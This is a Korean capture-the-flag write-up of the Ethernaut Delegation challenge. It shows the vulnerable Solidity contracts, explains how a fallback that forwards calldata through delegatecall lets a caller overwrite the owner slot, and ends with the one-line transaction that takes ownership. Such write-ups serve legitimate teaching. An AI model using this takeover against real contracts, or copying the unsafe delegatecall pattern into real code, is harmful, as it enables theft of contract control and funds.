문제#

1
// SPDX-License-Identifier: MIT
2
pragma solidity ^0.8.0;
3

4
contract Delegate {
5
    address public owner;
6

7
    constructor(address _owner) {
8
        owner = _owner;
9
    }
10

11
    function pwn() public {
12
        owner = msg.sender;
13
    }
14
}
15

16
contract Delegation {
17
    address public owner;
18
    Delegate delegate;
19

20
    constructor(address _delegateAddress) {
21
        delegate = Delegate(_delegateAddress);
22
        owner = msg.sender;
23
    }
24

25
    fallback() external {
26
        (bool result,) = address(delegate).delegatecall(msg.data);
27
        if (result) {
28
            this;
29
        }
30
    }
31
}

배경지식#

fallback()은 호출한 함수 selector가 현재 컨트랙트의 함수와 매칭되지 않을 때 실행되는 함수다. 이 문제에서는 Delegation에 pwn() 함수가 없다. 따라서 Delegation 주소로 pwn()의 calldata를 보내면 일반 함수 호출이 아니라 fallback()으로 들어간다. fallback()이 payable이 아니므로 이더를 같이 보내는 호출은 필요하지 않다. 여기서는 calldata만 보내면 된다.

low-level call은 ABI를 직접 인코딩해서 호출하는 방식이다. Solidity에서 함수 호출 calldata의 앞 4바이트는 함수 시그니처를 keccak256으로 해싱한 뒤 앞 4바이트만 잘라 만든다. 예를 들어 pwn()의 selector는 다음처럼 구할 수 있다.

1
web3.utils.keccak256("pwn()").slice(0, 10)

결과는 0xdd365b8b이다. 인자가 없는 함수이므로 calldata는 이 4바이트 selector만 있으면 된다.

delegatecall은 대상 컨트랙트의 코드를 실행하지만, 실행 컨텍스트는 호출한 컨트랙트의 것을 사용한다. 즉 A.delegatecall(B의 코드)라고 하면 코드는 B의 코드를 쓰지만 address(this), msg.sender, storage는 A 기준으로 유지된다. Delegate.pwn() 안에는 owner = msg.sender가 있는데, 이 코드가 delegatecall로 실행되면 Delegate.owner가 아니라 Delegation.owner를 바꾸게 된다.

문제 코드 분석#

먼저 Delegate의 pwn()을 보자.

1
contract Delegate {
2
    address public owner;
3

4
    constructor(address _owner) {
5
        owner = _owner;
6
    }
7

8
    function pwn() public {
9
        owner = msg.sender;
10
    }
11
}

Delegate에는 pwn()이 있고, 호출자의 주소를 owner에 저장한다. 일반적으로 Delegate 컨트랙트에 직접 pwn()을 호출하면 Delegate의 owner만 바뀐다. 하지만 이 문제의 목표는 Delegation의 owner를 가져오는 것이다. 그래서 Delegate를 직접 호출하면 안 되고, Delegation이 Delegate의 코드를 대신 실행하게 만들어야 한다.

이제 Delegation의 fallback()을 보자.

1
contract Delegation {
2
    address public owner;
3
    Delegate delegate;
4

5
    constructor(address _delegateAddress) {
6
        delegate = Delegate(_delegateAddress);
7
        owner = msg.sender;
8
    }
9

10
    fallback() external {
11
        (bool result,) = address(delegate).delegatecall(msg.data);
12
        if (result) {
13
            this;
14
        }
15
    }
16
}

Delegation에는 pwn() 함수가 없다. 그래서 pwn()의 selector인 0xdd365b8b를 Delegation 주소로 보내면 fallback()이 실행된다. fallback()은 받은 msg.data를 그대로 delegatecall에 넘긴다. 결국 Delegate 컨트랙트에서 같은 selector에 해당하는 pwn()이 실행된다. delegatecall은 storage를 Delegation 기준으로 사용한다. 두 컨트랙트 모두 첫 번째 상태변수로 address public owner를 가지고 있으므로 slot 0이 owner로 맞아 떨어진다. 따라서 Delegate.pwn()의 owner = msg.sender는 실제로 Delegation의 slot 0, 즉 Delegation.owner를 내 주소로 덮어쓴다.

필요한 조건은 세 가지다.

• Delegation에 없는 함수 selector를 보내 fallback()을 실행한다.
• fallback()이 msg.data를 그대로 delegatecall에 넘긴다.
• Delegate.pwn()이 delegatecall 컨텍스트에서 실행되어 Delegation.owner를 바꾼다.

이 조건이 모두 맞아 있으니 pwn()의 selector인 0xdd365b8b만 Delegation 인스턴스에 보내면 된다.

풀이#

pwn()의 함수 selector를 구해서 Delegation 인스턴스에 calldata로 보낸다.

1
web3.utils.keccak256("pwn()")
2
// '0xdd365b8b15d5d78ec041b851b68c8b985bee78bee0b87c4acf261024d8beabab'

함수 selector는 이 해시의 앞 4바이트이므로 0xdd365b8b를 보내면 된다. Delegation에는 이 selector에 해당하는 함수가 없으니 호출은 fallback()으로 들어간다. 그 안에서 Delegate에 delegatecall(msg.data)가 실행되고, 결국 pwn()이 돈다.

1
await contract.sendTransaction({ data: "0xdd365b8b" })